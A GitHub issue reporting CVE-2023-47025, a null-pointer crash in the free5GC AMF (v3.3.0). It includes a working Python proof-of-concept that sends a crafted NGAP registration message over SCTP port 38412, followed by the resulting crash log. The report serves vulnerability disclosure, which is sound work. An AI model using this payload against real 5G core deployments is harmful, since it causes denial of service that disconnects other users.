CVE-2023-47025: [Bugs]Amf crashed when failed to resolve the IP of ngap message , resulting in a null pointer reference. · Issue #501 · free5gc/free5gc

Describe the bug

When I try to send a captured UE registration request message to the AMF, the log shows ‘sctp accept from ,’ and the AMF crashes, causing disconnection for other UEs as well.

To Reproduce

Steps to reproduce the behavior:

1. Using free5gc-compose to establish the AMF.
2. run free5gc with default config.
3. Run the following POC python script
   `import sys, sctp, socket

if len(sys.argv) != 2:
print(“Usage: free5gc.py server-address”)
exit(0)

sk = sctp.sctpsocket_tcp(socket.AF_INET)
sk.connect((sys.argv[1], 38412))
ue_request=b’\x00\x0f\x40\x48\x00\x00\x05\x00\x55\x00\x02\x00\x01\x00\x26\x00\x1a\x19\x7e\x00\x41\x79\x00\x0d\x01\x02\xf8\x39\x00\x00\x00\x00\x00\x00\x00\x00\x30\x2e\x04\xf0\xf0\xf0\xf0\x00\x79\x00\x13\x50\x02\xf8\x39\x00\x00\x00\x01\x00\x02\xf8\x39\x00\x00\x01\xe8\xe8\x7e\xd4\x00\x5a\x40\x01\x18\x00\x70\x40\x01\x00’
sk.sctp_send(ue_request, ppid=socket.htonl(60))

sk.close()`

Expected behavior

I have sent the registration request of a UE that has already completed registration, so the expected behavior should be a notification that the user is already registered and a rejection of the request.However, the AMF crashed

Screenshots

Environment (please complete the following information):

• free5GC Version: v3.3.0
• OS: Ubuntu 20.04.1 live-server
• Kernel version: 5.4.0-165-generic

Trace File****Configuration File

Use the default config file.

PCAP File

crash.zip

Log File

amf | 2023-10-29T11:42:37.467203444Z [INFO][AMF][Ngap] [AMF] SCTP Accept from: <nil> amf | 2023-10-29T11:42:37.467906401Z [FATA][AMF][Ngap] panic: runtime error: invalid memory address or nil pointer dereference amf | goroutine 137 [running]: amf | runtime/debug.Stack() amf | /usr/local/go/src/runtime/debug/stack.go:24 +0x65 amf | github.com/free5gc/amf/internal/ngap/service.handleConnection.func1() amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:184 +0x58 amf | panic({0xbb3280, 0x13088a0}) amf | /usr/local/go/src/runtime/panic.go:1038 +0x215 amf | github.com/free5gc/amf/internal/ngap.Dispatch({0xdf2988, 0xc0001ec020}, {0xc0008ce000, 0x40000, 0x40000}) amf | /go/src/free5gc/NFs/amf/internal/ngap/dispatcher.go:19 +0xac amf | github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0001ec020, 0x40000, {0xd03d48, 0xd03d58, 0xd03d50}) amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:237 +0x417 amf | created by github.com/free5gc/amf/internal/ngap/service.listenAndServe amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:158 +0x9fe n3iwf | 2023-10-29T11:42:37.490422713Z [WARN][N3IWF][NGAP] [SCTP] Close connection. n3iwf | 2023-10-29T11:42:37.490494299Z [INFO][N3IWF][NGAP] NGAP receiver stopped n3iwf | 2023-10-29T11:42:37.490506087Z [INFO][N3IWF][NGAP] NGAP server stopped ueransim | [2023-10-29 11:42:37.490] [sctp] [debug] SCTP association shutdown (clientId: 2) ueransim | [2023-10-29 11:42:37.491] [sctp] [warning] Unhandled SCTP notification received ueransim | [2023-10-29 11:42:37.491] [ngap] [error] Association terminated for AMF[2] ueransim | [2023-10-29 11:42:37.491] [ngap] [debug] Removing AMF context[2]

Additional context

This security issue could allow anyone to send an message that would cause an amf denial of service and severely affect other users.